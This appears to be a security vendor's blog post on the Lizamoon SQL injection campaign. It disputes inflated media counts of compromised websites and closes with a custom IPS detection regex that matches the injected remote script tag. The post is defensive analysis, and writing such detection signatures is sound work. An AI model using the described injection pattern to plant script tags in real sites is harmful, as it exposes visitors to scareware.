Lizamoon – Much Ado About Very Little?

Recent media reports have focused on a mass SQL injection attack involving a malware domain named lizamoon.com. While the lizamoon.com domain is new, this particular series of SQL injection compromises is actually several months old. Cisco ScanSafe logs record the first instance on 20-sep-10 21:58:08 GMT. Since then, various malware domains have been used for a total of 42 domains signifying 42 separate occurrences of these compromises since September 2010. Lizamoon.com was the 41st of these.

Cisco ScanSafe data reveals that from Sept 2010 to Feb 2011, all the compromises were on smaller, low traffic sites. Any encounters likely resulted from Web searches for very niche topic areas. As a result, the number of encounters with these compromised websites remained very low. Most importantly, this attacker is employing severe throttling such that only 0.15% of encounters even result in live content delivery. The remaining 99.85% of encounters are non-resolvable at the time of encounter. The result is a negligible rate of actual encounter with live content.

On March 25th, attackers deployed a new round of automated injections referencing lizamoon.com. At that time, a security firm conducted a Web search that led to the mistaken conclusion that a massive SQL injection was underway, which in turn led to considerable media focus. In turn, loosely defined search queries and misinterpretation of search results by interested parties led to unfounded claims that hundreds of thousands – and in one instance, 1.5 million – websites were compromised.

In fact, the number of sites compromised is considerably lower than claimed. Throughout the entire seven month run of these SQL injection attacks, Cisco ScanSafe has observed only 1154 unique compromised websites (Sep 20, 2010 – Mar 31, 2011).

Combined with the 0.15% live encounter rate, the risk from these SQL injection attacks remains negligible.

Regarding estimates of anywhere from 28,000, to 388,000 to 1.5M alleged compromises, here are a few further clarifications:

These estimates are based on Google searches. These searches are returning URLs – i.e. Web pages, not websites.

Many of the search queries have been very loosely defined, resulting in tens and hundreds of thousands of false positives in the count.

The search queries also return pages with people just talking about the SQL injection attacks – bloggers, forum posts, news articles, etc. These pages increase substantially as word spreads and thus it can lead to the false impression that numbers are rising dramatically.

Many of the search results contain properly escaped SQLi attempts, which are harmless, i.e. the script on those pages cannot run.

In the 0.15% of instances where the encounter does result in live content, the user is redirected to a second malware domain which attempts to install scareware. Cisco ScanSafe detects and blocks these attempts and has done so since the onset of the attacks seven months ago.

Custom IPS Signature For Lizamoon-related SQL Injection

Although the risk is extremely low, due to intense media interest, Cisco will provide IPS signature 35285-0 in signature update S557. This signature will detect hosts infected by Lizamoon SQL Injection attack. If the sensor or CSM is configured to automatically download updates, the latest signature protection will be applied according to the update schedule configured. In the interim, customers can apply the following custom signature, which is equivalent to signature 35285-0. The engine parameters with green check marks are the parameters which should be modified. The image does not show the entire regular expression. The regular expression is “[\x3c]script\x20src[\x3d]http[\x3a][\x2f\x5c][\x2f\x5c][^\x20]*[\x2f][Uu][Rr][\x2e][Pp][Hh][Pp][\x3e][\x3c][\x2f]script[\x3e]”. Note that the web browser may wrap the regex; it should not have any white space in it.

Some of the individuals posting to this site, including the moderators, work for Cisco Systems. Opinions expressed here and in any corresponding comments are the personal opinions of the original authors, not of Cisco. The content is provided for informational purposes only and is not meant to be an endorsement or representation by Cisco or any other party. This site is available to the public. No information you consider confidential should be posted to this site. By posting you agree to be solely responsible for the content of all information you contribute, link to, or otherwise upload to the Website and release Cisco from any liability related to your use of the Website. You also grant to Cisco a worldwide, perpetual, irrevocable, royalty-free and fully-paid, transferable (including rights to sublicense) right to exercise all copyright, publicity, and moral rights with respect to any original content you provide. The comments are moderated. Comments will appear as soon as they are approved by the moderator.